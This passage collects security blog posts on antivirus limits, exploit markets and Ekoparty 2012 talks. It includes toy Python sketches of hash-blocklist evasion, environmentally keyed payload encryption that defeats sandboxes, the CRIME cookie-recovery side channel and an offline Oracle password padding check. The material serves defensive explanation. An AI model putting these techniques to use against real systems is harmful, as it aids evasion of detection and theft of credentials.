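"""Minimal sketch: why hash-detection alone is fragile. A one-byte change to a
sample yields a completely different digest, so an exact-hash blocklist misses
the repacked file. Sample bytes and blocklist are illustrative."""
import hashlib

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

original = b"MZ\x90\x00...pretend this is a known malicious executable..."
blocklist = {sha256(original)}                 # hash-based "signature"

repacked = original + b"\x00"                  # attacker appends one byte

print("original blocked:", sha256(original) in blocklist)   # True
print("repacked blocked:", sha256(repacked) in blocklist)   # False
```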

Big Data, Machine Learning, and Natural Language Processing

My presentation also mentioned something we hear a lot about today… BIG DATA. Big Data plus Machine Learning coupled with Natural Language Processing allows a clustering or classification algorithm to make predictive decisions based on statistical and mathematical models. This technology is not a replacement for what exists. Instead, it incorporates what already exists (such as hashes, signatures, heuristics, semantic detection) and adds more correlation in a scientific and statistic manner. The growing number of threats combined with a limited number of malware analysts makes this next step virtually inevitable.

While machine learning, natural language processing, and other artificial intelligence sciences will hopefully help in supplementing the detection capabilities, keep in mind this technology is nothing new. However, the context in which it is being used is new. It has already been used in multiple existing technologies such as anti-spam engines and Google translation technology. It is only recently that it has been applied to Data Leakage Prevention (DLP), web filtering, and malware/exploit content analysis. Have no doubt, however, that like most technologies, it can still be broken.

Hopefully most of you have read Imperva’s report, which found that less than 5% of antivirus solutions are able to initially detect previously non-cataloged viruses. Regardless of your opinion on Imperva’s testing methodologies, you might have also read the less-scrutinized Cisco 2011 Global Threat report that claimed 33% of web malware encountered was zero-day malware not detectable by traditional signature-based methodologies at the time of encounter. This, in my experience, has been a more widely accepted industry statistic.

What these numbers are telling us is that the technology, if looked at individually, is failing us, but what I am saying is that it is all about context. Penetrating defenses and gaining access to a non-critical machine is never desirable. However, a “smart” defense, if architected correctly, would incorporate a number of technologies, situated on your network, to protect the critical assets you care about most.

 

 

 

The Cloud versus the End-Point

If you were to attend any major conference in the last few years, most vendors would claim “the cloud” is where protection technology is headed. Even though there is evidence to show that this might be somewhat true, the majority of protection techniques (such as hash-detection, signature-detection, reputation, and similar technologies) simply were moved from the desktop to the gateway or “cloud”. The technology and techniques, however, are the same. Of course, there are benefits to the gateway or cloud, such as consolidated updates and possibly a more responsive feedback and correlation loop from other cloud nodes or the company lab headquarters. I am of the opinion that there is nothing wrong with having anti-virus software on the desktop. In fact, in my graduate studies at UCSD in Computer Science, I remember a number of discussions on the end-to-end arguments of system design, which argued that it is best to place functionality at end points and at the highest level unless doing otherwise improves performance.

The desktop/server is the end point where the most amount of information can be disseminated. The desktop/server is where context can be added to malware, allowing you to ask questions such as:

 

  • Was it downloaded by the user and from which site?
  • Is that site historically common for that particular user to visit?
  • What happened after it was downloaded?
  • Did the user choose to execute the downloaded binary?
  • What actions did the downloaded binary take?

Hashes, signatures, heuristics, semantic-detection, and reputation can all be applied at this level. However, at a gateway or in the cloud, generally only static analysis is performed due to latency and performance requirements.

This is not to say that gateway or cloud security solutions cannot observe malicious patterns at the gateway, but constraints on state and the fact that this is a network bottleneck generally make any analysis node other than the end point less thorough. I would argue that both desktop and cloud or gateway security solutions have their benefits, though, and if used in conjunction, they add even more visibility into the network. As a result, they supplement what a desktop antivirus program cannot accomplish and add collective analysis.

 

Conclusion

My main point is that to have a secure network you have to think offensively by architecting security to fit your organization’s needs. Antivirus software on the desktop is not the problem. The problem is the lack of planning that goes into deployment, as well as the lack of understanding of the capabilities of desktop, gateway, network, and cloud security solutions. What must change is the haste with which network teams deploy security technologies without having a plan, a threat model, or a holistic organizational security framework in place that takes into account how all security products work together to protect critical assets.

With regard to the cloud, make no mistake that most of the same security technology has simply moved from the desktop to the cloud. Because it operates at the network level, latency limits how deeply the file/network stream can be analyzed, and fewer checks are performed for the sake of user performance. People want to feel safe relying on the cloud’s security and feel assured knowing that a third party is handling all security threats, and this might be the case. However, companies need to make sure a plan is in place and that they fully understand the capabilities of the security products they have chosen, whether they be desktop, network, gateway, or cloud based.

If you found this topic interesting, Chris Valasek and I are working on a related project that Chris will be presenting at An Evening with IOActive on Thursday, January 17, 2013. We also plan to talk about this at the IOAsis at the RSA Conference. Look for details!

INSIGHTS | January 7, 2013

The Demise of Desktop Antivirus

Are you old enough to remember the demise of the ubiquitous CompuServe and AOL CDs that used to be attached to every computer magazine you ever bought between the mid-’80s and mid-’90s? If you missed that annoying period of Internet history, maybe you’ll be able to watch the death of desktop antivirus instead.

65,000 AOL CD’s as art

Just as dial-up subscription portals and proprietary “web browsers” represent a yesteryear view of the Internet, desktop antivirus is similarly being confined to the annals of Internet history. It may still be flapping vigorously like a freshly landed fish, but we all know how those last gasps end.

To be perfectly honest, it’s amazing that desktop antivirus has lasted this long. To be fair though, the product you may have installed on your computer (desktop or laptop) bears little resemblance to the antivirus products of just 3 years ago. Most vendors have even done away with the “antivirus” term – instead they’ve tried renaming their products as “protection suites” and “prevention technology” and throwing in a bunch of additional threat detection engines for good measure.

I have a vision of a hunchbacked Igor working behind the scenes stitching on some new appendage or bolting on an iron plate for reinforcement to the Frankenstein corpse of each antivirus product as he tries to keep it alive for just a little bit longer…

That’s not to say that a lot of effort doesn’t go into maintaining an antivirus product. However, with the millions upon millions of new threats each month, it’s hardly surprising that the technology (and approach) falls further and further behind. Despite that, the researchers and engineers who maintain these products try their best to keep the technology as relevant as possible… and certainly don’t like it when anyone points out the gap between the threat and the capability of desktop antivirus to deal with it.

For example, the New York Times ran a piece on the last day of 2012 titled “Outmaneuvered at Their Own Game, Antivirus Makers Struggle to Adapt” that managed to get many of the antivirus vendors riled up – interestingly enough not because of the claims of the antivirus industry falling behind, but because some of the statistics came from unfair and unscientific tests. In particular there was great annoyance that a security vendor (representing an alternative technology) used VirusTotal coverage as their basis for whether or not new malware could be detected – claiming that initial detection was only 5%.

I’ve discussed the topic of declining desktop antivirus detection rates (and evasion) many, many times in the past. From my own experience, within corporate/enterprise networks, desktop antivirus detection typically hovers at 1-2% for the threats that make it through the various network defenses. For newly minted malware that is designed to target corporate victims, the rate is pretty much 0% and can remain that way for hundreds of days after the malware has been released into the wild.

You’ll note that I typically differentiate between desktop and network antivirus. The reason for this is because I’m a firm advocate that the battle is already over if the malware makes it down to the host. If you’re going to do anything on the malware prevention side of things, then you need to do it before it gets to the desktop – ideally filtering the threat at the network level, but gateway prevention (e.g. at the mail gateway or proxy server) will be good enough for the bulk of non-targeted Internet threats. Antivirus operations at the desktop are best confined to cleanup, and even then I wouldn’t trust any of the products to be particularly good at that… all too often reimaging of the computer isn’t even enough in the face of malware threats such as TDL.

So, does an antivirus product still have what it takes to earn the real estate it takes up on your computer? As a standalone security technology – no, I don’t believe so. If it’s free, never bothers me with popups, and I never need to know it’s there, then it’s not worth the effort of uninstalling it and I guess it can stay… other than that, I’m inclined to look at other technologies that operate at the network layer or within the cloud; stop what you can before it gets to the desktop. Many of the bloated “improvements” to desktop antivirus products over recent years seem analogous to improving the hearing of a soldier so he can more clearly hear the ‘click’ of the mine he’s just stood on as it arms itself.

I’m all in favor of retraining any hunchbacked Igor we may come across. Perhaps he can make artwork out of discarded antivirus DVDs – just as kids did in the 1990s with AOL CDs?

— Gunter Ollmann, CTO — IOActive, Inc.
INSIGHTS | December 20, 2012

Exploits, Curdled Milk and Nukes (Oh my!)

Throughout the second half of 2012 many security folks have been asking “how much is a zero-day vulnerability worth?” and it’s often been hard to believe the numbers that have been (and continue to be) thrown around. For the sake of clarity though, I do believe that it’s the wrong question… the correct question should be “how much do people pay for working exploits against zero-day vulnerabilities?”

The answer in the majority of cases tends to be “it depends on who’s buying and what the vulnerability is,” regardless of the question’s particular phrasing.

On the topic of exploit development, last month I wrote an article for DarkReading covering the business of commercial exploit development, and in that article you’ll probably note that I didn’t discuss the prices of what the exploits are retailing for. That’s because of my elusive answer above… I know of some researchers with their own private repository of zero-day remote exploits for popular operating systems seeking $250,000 per exploit, and I’ve overheard hushed bar conversations that certain US government agencies will beat any foreign bid by four-times the value.

But that’s only the thin-edge of the wedge. The bulk of zero-day (or nearly zero-day) exploit purchases are for popular consumer-level applications – many of which are region-specific. For example, a reliable exploit against Tencent QQ (the most popular instant messenger program in China) may be more valuable than an exploit in Windows 8 to certain US, Taiwanese, Japanese, etc. clandestine government agencies.

More recently some of the conversations about exploit sales and purchases by government agencies have focused in upon the cyberwar angle – in particular, that some governments are trying to build a “cyber weapon” cache and that unlike kinetic weapons these could expire at any time, and that it’s all a waste of effort and resources.

I must admit, up until a month ago I was leaning a little towards that same opinion. My perspective was that it’s a lot of money to be spending on something that will most likely sit on the shelf and expire into uselessness before it can ever be used. And then I happened to visit the National Museum of Nuclear Science & History on a business trip to Albuquerque.

Museum: Polaris Missile

 

Museum: Minuteman missile part?

For those of you that have never heard of the place, it’s a museum that plots out the history of the nuclear age and the evolution of nuclear weapon technology (and I encourage you to visit!).

Anyhow, as I literally strolled from one (decommissioned) nuclear missile to another – each lying on its side rusting and corroding away, having never been used – it finally hit me: governments have been doing the same thing for the longest time, and cyber weapons really are no different!

Perhaps it’s the physical realization of “it’s better to have it and not need it, than to need it and not have it”, but as you trace the billions (if not trillions) of dollars that have been spent by the US government over the years developing each new nuclear weapon delivery platform, deploying it, manning it, eventually decommissioning it, and replacing it with a new and more efficient system… well, it makes sense and (frankly) it’s laughable how little money is actually being spent in the cyber-attack realm.

So what if those zero-day exploits purchased for measly 6-figure wads of cash curdle like last month’s milk? That price wouldn’t even cover the cost of painting the inside of a decommissioned missile silo.

No, the reality of the situation is that governments are getting a bargain when it comes to constructing and filling their cyber weapon caches. And, more to the point, the expiry of those zero-day exploits is a well understood aspect of managing an arsenal – conventional or otherwise.

— Gunter Ollmann, CTO – IOActive, Inc.

INSIGHTS | October 2, 2012

Impressions from Ekoparty

Another ekoparty took place in Buenos Aires, Argentina, and for a whole week Latin America had the chance to meet and get in touch with the best researchers on this side of the world.
A record-breaking 150 entries were received and analysed by the excellent academic committee formed by Cesar Cerrudo, Nico Waisman, Sebastian Muñiz, Gerardo Richarte, and Juliano Rizzo.
More than 1,500 people enjoyed 20 talks without any interruption, except when the Mariachis played.
Following last year’s theme, when ekoparty became the last bastion of resistance in the rebellion against the machines, this year the resistance had to move off the Earth to fight the battle of knowledge sharing in another world.
IOActive again joined us with its entire research team and an excellent stand that included a bar and bartender throughout the event. IOActive went further and also sponsored the VIP dinner to honor all exhibitors, organizers, and sponsors, and accepted the challenge: Argentine asado vs. tacos, prepared by its own research team. It was a head-to-head contest, but the home advantage was that the meat was from Argentina 🙂

 

We would like to thank all the researchers, participants, and sponsors who contribute to ekoparty’s growth! See you next year to find out how this story continues!

By Jennifer Steffens @securesun

For those who know me, I’m no stranger to the world of conferences and have attended both big and small cons around the world. I love experiencing the different communities and learning how different cultures impact the world of security as a whole. I recently had the pleasure of attending my second Ekoparty in Buenos Aires with IOActive’s Latin American team and it was again one of my all time favorites.

To put it simply, I am blown away by both the conference and the community. Francisco, Federico, and crew do an amazing job from start to finish. The content is fresh and innovative. They offer all the great side acts that con attendees have grown to love: a CTF, lock-picking stations, giant robots with lasers, a computer museum, as well as the beloved old-school Mario Brothers game. Even the dreaded vendor area is vibrant and full of great conversations, as well as a bit of booze thanks to both our bar service and Immunity’s very tasty beer!

But the real heart of Ekoparty is the community. The respect and openness that everyone brings to the experience is refreshing and gives the conference a very “family-like” feel – even with 1500 people. I met so many interesting people and spent each day engaged in inspiring conversations about the industry, the culture and of course, how to be a vegetarian in Argentina (not easy AT ALL!).

A special thanks to Federico and Francisco for the invitation and the generous VIP treatment throughout the week. It was a great opportunity for us to bring together IOActive’s Latin American team, which now includes 12 researchers from Argentina, Brazil, Colombia and Mexico, as well as to meet potential new “piratas” in the making. I am amazed every day at what that team is able to accomplish, and I am already looking forward to Ekoparty 2013 with an even bigger team of IOActive “piratas” joining us.

Thanks to the organizers, speakers, and attendees of Ekoparty 2012. The week was fantastic and I hope to see you next year!

 

By Cesar Cerrudo @cesarcer

 

This was my 5th time presenting at Ekoparty (I only missed one, the year my son was born 🙂). Ekoparty is one of my favorite conferences; I feel like part of it, and it takes place in my own country, which makes it special for me. It’s nice to get together with all the great Argentinean hackers, who by the way are both very good and very numerous, and with friends and colleagues from around the world. Over the years I have watched it grow in quality and quantity, and I can say that this conference is now at the same level as the biggest and best-known ones, and it gets better every year.

 

This year I had the honor of giving the opening keynote, “Cyberwar para todos,” where I presented my thoughts and views on the global cyberwar scenario and encouraged people to research the topic and reach their own conclusions.

 

We sponsored a VIP dinner where speakers, sponsors, and friends enjoyed a great night with some long-awaited Mexican tacos! We also had a nice booth with free coffee service in the morning and an open bar in the afternoon; I don’t think I need to stress that it was a very, very popular booth 🙂

 

The talks were great, and a lot of research was presented for the first time at Ekoparty; just take a look at recent news and you will see that this is not just “another“ conference. The last time I remember a security/hacking conference generating this much related news coverage was Black Hat/DEF CON. We could say Ekoparty is becoming one of the most important security/hacking conferences in the world.

 

 By Stephan Chenette @StephanChenette

OK, I’ll try my best to follow Cesar (this year’s keynote speaker), Francisco (one of the founders of EkoParty), and Jennifer (our CEO) in giving my impressions of the EkoParty conference. If you haven’t been to EkoParty, stop what you’re doing right now, check out the website (http://ekoparty.org), and set yourself a reminder to buy a plane ticket and an entry ticket for next year, because this is a con worth attending. If nothing else, you’ll learn or confirm what you have thought for years: that the Latin American hacker community is awesome, and you should be paying attention to their research if you haven’t been already.

Three days long, EkoParty comprises a CTF, a lock-picking area, trainings, and 20 interesting talks on research and security findings. The venue is something you’d expect from CCC or PH-Neutral: an industrial, bare-bones building loaded up with ping-pong tables and massive computing power, with no shortage of smoke machines, lights, and crazy gadgets on stage… oh, and as you read above in Francisco’s summary, a Mariachi band (hey, it is Argentina!).

The building reminded me of the elaborate Faraday cage Gene Hackman’s character set up in the movie Enemy of the State to hide from the NSA, except EkoParty was filled with around 1,500 attendees and organizers.

 

 

 

IOActive sponsored a booth and tried its best to provide attendees with as much quality alcohol as possible =]
 

Our booth is where I spent most of my time when not attending talks, so that I could hang out with IOActive’s Latin American team members, who come from Mexico, Brazil, Colombia, and Argentina.

I saw a number of talks while at EkoParty, but I’m sure most of you will agree the three most noteworthy talks were:
    • CRIME (Juliano Rizzo and Thai Duong)
    • Cryptographic Flaws in Oracle Database Authentication Protocol (Esteban Fayo)
    • Dirty Use of USSD Codes in Cellular Networks (Ravi Borgaonkar)
I won’t go into details on the above talks, as more information is now available online about them.
I was lucky enough to be accepted as a speaker this year and to talk about research focused on defeating network and file-system detection. My past development experience is in threat detection, but as I stated in my presentation: you must think offensively when creating defensive technology, and you must not make the mistake of overselling it while glossing over its limitations (a problem most salespeople at security companies have these days).
I spent about 75% of my time reviewing various content-detection technologies from the last 20 years and explaining each one’s limitations. I then talked about the use of machine learning and natural language processing for both exploit and malware detection, as well as attribution.
Machine learning, like any technology used in defense, has its limitations, and I tried to explain my point of view and the importance of not only having a layered defense, but having a well-thought-out layered defense that makes sense for your organization.
As I stated in my presentation, attackers have several stages they typically go through to pull off a full attack and successfully exfiltrate data:

 

    • Recon (intelligence gathering)
    • Penetration (exploitation of defenses)
    • Control (staging a persistent mechanism within the network)
    • Internal recon
    • Exfiltration of data

 

In my presentation I looked at the reality of offensive techniques against detection technologies: attackers are going to stay just far enough ahead of the defense curve to avoid detection.

 

(Stephan Chenette’s presentation on “The Future of Automated Malware Generation”)
For example, with Gauss and Zeus we’ve seen DLLs encrypted with a key found only on the targeted machine, and downloaded binaries encrypted with information from the infected host. For the record, encrypting binaries with target-specific information essentially prevents any behavioral sandbox from running the binary outside of its intended environment.
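To make that point concrete, here is a minimal, hypothetical sketch of this kind of environmental keying; the key-derivation inputs and the toy XOR keystream below are my own illustrative assumptions, not details taken from Gauss or Zeus.

# Illustrative sketch of environmental keying: the key is derived from
# attributes of the intended host, so any other machine (for example, an
# analysis sandbox) derives a different key and never sees the plaintext.
import hashlib
import platform
import os

def derive_host_key(salt: bytes) -> bytes:
    # Key material comes only from the local environment (hypothetical choice
    # of attributes); a different host yields a different key.
    host_facts = (platform.node() + os.path.expanduser("~")).encode()
    return hashlib.sha256(salt + host_facts).digest()

def xor_keystream(data: bytes, key: bytes) -> bytes:
    # Toy stream cipher (SHA-256 in counter mode), enough to show the concept;
    # real samples used proper ciphers.
    out = bytearray()
    counter = 0
    while len(out) < len(data):
        out.extend(hashlib.sha256(key + counter.to_bytes(8, "big")).digest())
        counter += 1
    return bytes(b ^ k for b, k in zip(data, out[: len(data)]))

if __name__ == "__main__":
    salt = b"example-salt"
    payload = b"payload that only runs on the intended host"
    blob = xor_keystream(payload, derive_host_key(salt))
    # Decryption only succeeds where derive_host_key() reproduces the key.
    assert xor_keystream(blob, derive_host_key(salt)) == payload

Run anywhere other than the machine that produced the blob, derive_host_key() yields a different key and the payload stays opaque, which is exactly why a generic sandbox cannot execute it as intended.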
So maybe attackers of the future will only make incremental improvements to thwart detection, or maybe we’ll start seeing anti-clustering and anti-classification techniques added to the attacker’s arsenal as machine learning becomes another layer of defense. The future is of course unknown, but I do have my suspicions.
In my concluding slides I stressed that there is much room for improvement in detecting a threat before it succeeds, and that a defensive strategy should be layered in a manner that forces the attacker to spend time, resources, and different skill levels at each layer, hopefully exposing enough of himself or herself in the process to give the targeted organization time to mitigate the threat, if not halt the attack altogether.
This was by far the largest crowd I’ve ever spoken in front of, and it goes down as one of the best conferences I’ve attended. Thanks again to the EkoParty committee for inviting me to present; I’ll try my best to be back next year!





By Ariel Sanchez

 

At Ekoparty we had the opportunity to attend presentations that showed a high level of innovation and creativity.

 

Here are some personal highlights:

 

 *The CRIME Attack presentation by Juliano Rizzo and Thai Duong
 *Trace Surfing presentation by Agustin Gianni
 *Cryptographic Flaws in Oracle Database Authentication Protocol presentation by Esteban Fayo

 

I can’t wait to see what is coming in the next ekoparty!

 

 

By Tiago Assumpcao @coconuthaxor

 

If my memory is accurate, this was my fourth EkoParty. From the first one to now, the numbers related to the conference have grown beyond my imagination. On the other hand, EkoParty remains the same in one respect: it has the energetic blood of Latin American hackers. Too many of them, actually. Buenos Aires has a magical history of producing talent like nowhere else, and the impressive numbers and quality of EkoParty today definitely have to do with that magic.

 

There were many great talks on a wide range of topics. I will summarize the ones I most appreciated, and I am forced to leave aside the ones I didn’t have the chance to catch.

 

Cyberwar para todos, I’ve seen people complaining about this topic, either because it’s political (rather than technical), or because “it’s been stressed too much” already. In my opinion, one can’t ignore how the big empires think about information security. Specifically, here is what I liked about this talk: the topic might have been stressed in North America, but the notion of cyberwar, per Gen. Keith Alexander’s vision, is still unknown to most in South America. A few years ago the Brazilian CDCiber (Cyber Defense Centre) was created and, despite effort coming directly from the President, the local authorities are still very naïve, to say the least, compared to their rich cousins. Cesar raises questions about that.

 

Satellite baseband mods: Taking control of the InmarSat GMR-2 phone terminal, this was probably my favorite talk. They showed how a user can easily modify satellite phones at will, poking data that comes in and out of the device. Furthermore, the presenters showed how communication technologies very similar to GSM, when applied over a different medium, can open whole new vectors of potential attacks. Finally, Sebastian “Topo” Muniz is one of the most hilarious speakers in the infosec industry.

 

Trace Surfing, this is one of those rare talks that resolve hard problems with very simple solutions. Agustín showed how one can retrieve high-level information about the Windows heap, during the course of an execution trace, simply by tracking ABI specifics at call-sites of choice. The simplicity of his solution also makes it really fast. Great work!

 

PIN para todos (y todas), basically Pablo Sole created an interface that allows one to write Pin-based tools to instrument JavaScript. I heard it’s impressively fast.

 

What I really wanted to have seen, but couldn’t…

 

OPSEC: Because Jail is for wuftpd, unfortunately, they had Grugq speaking at 9am. I can’t digest humour so early and will have to ask him for a secondhand presentation.

 

Literacy for Integrated Circuit Reverse Engineering, very sadly, I didn’t catch Alex’s presentation. But if you are into reverse engineering modern devices, I would recommend it with both my eyes closed, nonetheless.

 

 

By Lucas Apa @lucasapa

What began publicly as an e-zine early in the century has now become the most important Latin American security conference: ekoparty. The entire Latin American team landed in Buenos Aires to spend an amazing week.
My “ekoparty week” started on Monday, when I was invited to attend a “Malware Analysis Training” by ESET after solving a binary-unpacking challenge posted on their blog. The first two intensive days were devoted to paid trainings covering the following topics: cracking, exploiting, SAP security, penetration testing, web security, digital forensics, and threat defense. Every classroom was almost fully booked.

The conference started on Wednesday at the Konex Cultural Center, one of the city’s most famous cultural centers, especially for music and events. The building used to be an oil factory some decades ago.
On Wednesday our CTO, Cesar Cerrudo, gave the main keynote of the day.
Many workshops were open to any conference attendee for the rest of the day.

At night we enjoyed a classic “Mexican grill” at IOActive’s party, to which VIP guests were invited. The meal was brought to you by Alejandro Hernández and Diego Madero, our Mexican security consultants.
Thursday and Friday were the most awaited days, since the presentations were going to start.

My favorite talks were:

*Taking Control of the InmarSat GMR-2 Phone Terminal (Sebastian Muñiz and Alfredo Ortega): Without modifying the firmware image, the researchers managed to send AT commands to the phone terminal that write arbitrary memory. They copied in binary instrumentation code for logging and hooking what the phone really sends during common actions like sending an SMS. They then wrote to the “data” section to redirect the execution flow at a certain point, and discovered that messages sent to the satellite “might” be vulnerable to “memory corruption” if they are preprocessed by the satellite before retransmission. No satellites were harmed.

*VGA Persistent Rootkit (Nicolás Economou and Diego Juarez): Showed a new combination of techniques for reliably modifying the firmware of a VGA card to execute code or add new malicious basic blocks.

*CRIME (Juliano Rizzo and Thai Duong): The most awaited talk revealed a new chosen-plaintext attack in which compression makes it possible to recognize which sequences of bytes are already present in the TLS data. The attack works like BEAST, with two requirements: capturing the victim’s encrypted traffic and controlling his browser through a web vulnerability (or a MITM on an HTTP service). By forcing the browser to include specific strings in the HTTP resource location, they found that if a portion of the chosen string is already present in the cookie, the TLS data compresses better. This makes it possible to brute-force, byte by byte, the piggybacked cookie that is automatically added to the request.
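As an aside, the length side channel described above is easy to simulate offline. The following sketch is a toy simulation of my own (hypothetical cookie and request format, no TLS or network involved) showing how the size of a DEFLATE-compressed request shrinks when an attacker-controlled guess matches bytes of a secret included in the same stream:

# Toy simulation of the compression length side channel behind CRIME.
import zlib
import string

SECRET = b"Cookie: session=s3cr3tvalue"  # unknown to the attacker in real life

def compressed_len(attacker_controlled: bytes) -> int:
    # In the real attack this length is observed on the wire as the size of
    # the compressed-then-encrypted TLS record.
    request = b"GET /" + attacker_controlled + b" HTTP/1.1\r\n" + SECRET + b"\r\n"
    return len(zlib.compress(request, 9))

def recover(prefix: bytes, alphabet: bytes, length: int) -> bytes:
    known = prefix
    for _ in range(length):
        # The guess yielding the shortest compressed output extends the
        # longest match against the secret already present in the stream.
        best = min(alphabet, key=lambda c: compressed_len(known + bytes([c])))
        known += bytes([best])
    return known

if __name__ == "__main__":
    alphabet = (string.ascii_lowercase + string.digits).encode()
    print(recover(b"Cookie: session=", alphabet, len(b"s3cr3tvalue")))

In practice, Huffman coding introduces ties that the real attack has to break with additional tricks, so treat this purely as an illustration of the principle.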

*The Future of Automated Malware Generation (Stephan Chenette): Our Director of R&D showed the approaches different AVs take to detect malware, and how those approaches mostly fail. It is difficult to defend ourselves against something we don’t know, but we must remember that attackers are having fun with machine learning too!

*Cryptographic Flaws in the Oracle DB Authentication Protocol (Esteban Fayó): When authenticating a user, Oracle uses the hashed password (stored in the database) as the key for encrypting a random server session key. The client hashes its password and then tries to decrypt the encrypted session key that the server returned. The problem is that it is possible to recognize whether this decryption produces invalid padding, so candidate passwords can be tried offline: the attacker can brute-force the decryption locally until valid padding occurs (occasionally a wrong password collides with valid padding, so it is not always the real one). This vulnerability was reported to Oracle two years ago, but no patch had been provided at the time of the talk.
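For readers wondering why this enables an offline attack, here is a heavily simplified, hypothetical sketch of the structure of the check. The real O5LOGON key derivation, salt handling, and cipher details differ, and the function and parameter names below are made up for illustration (it assumes PyCryptodome for AES):

# Hypothetical sketch of the offline padding check described above.
import hashlib
from Crypto.Cipher import AES  # pip install pycryptodome

def candidate_key(password: str, salt: bytes) -> bytes:
    # Placeholder key derivation; stands in for Oracle's real password hashing.
    return hashlib.sha1(password.encode() + salt).digest()[:16]

def padding_is_valid(plaintext: bytes) -> bool:
    # PKCS#7-style check: the last byte gives the pad length and every pad
    # byte must equal it. This check is the offline "oracle".
    pad = plaintext[-1]
    return 1 <= pad <= 16 and plaintext.endswith(bytes([pad]) * pad)

def offline_guess(captured_blob: bytes, iv: bytes, salt: bytes, wordlist):
    # captured_blob is the encrypted session key observed in the handshake
    # (length must be a multiple of the block size); everything below runs
    # locally, with no further contact with the server.
    for password in wordlist:
        cipher = AES.new(candidate_key(password, salt), AES.MODE_CBC, iv)
        if padding_is_valid(cipher.decrypt(captured_blob)):
            yield password  # likely the password (rare false positives occur)

The point is only that the attacker needs a single captured handshake and can then test candidate passwords as fast as local hardware allows.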

 

By Alejandro Hernández @nitr0usmx

 

After a 10-hour flight delay, I finally landed in Buenos Aires. As soon as I could, I went straight to the VIP party to meet up with the IOActive team and to help prepare some Mexican tacos and quesadillas (made by Diego Bauche @dexosexo).

 

The next day, Thursday, I had the chance to attend Stephan Chenette’s talk (@StephanChenette), a really interesting presentation about automated malware generation and future expectations. His presentation was well structured: he started with the current state of malware generation/defense and then explained the future of malware generation/defense by way of current malware trends. The same day, I enjoyed Esteban Fayo’s talk (@estemf) because he showed a live demo of cracking an Oracle password by taking advantage of some flaws in the Oracle authentication protocol.

 

The venue, KONEX, the same as last year, was really cool: there were vendor booths, old computers, video games (where I spent about two hours playing Super Mario Bros), and a cocktail bar, which was obviously the IOActive booth ;).

 

In conclusion, I had a great time with my colleagues, enjoying red wine and Argentine asado in addition to the amazing talks.

 

I definitely hope to be there again next year.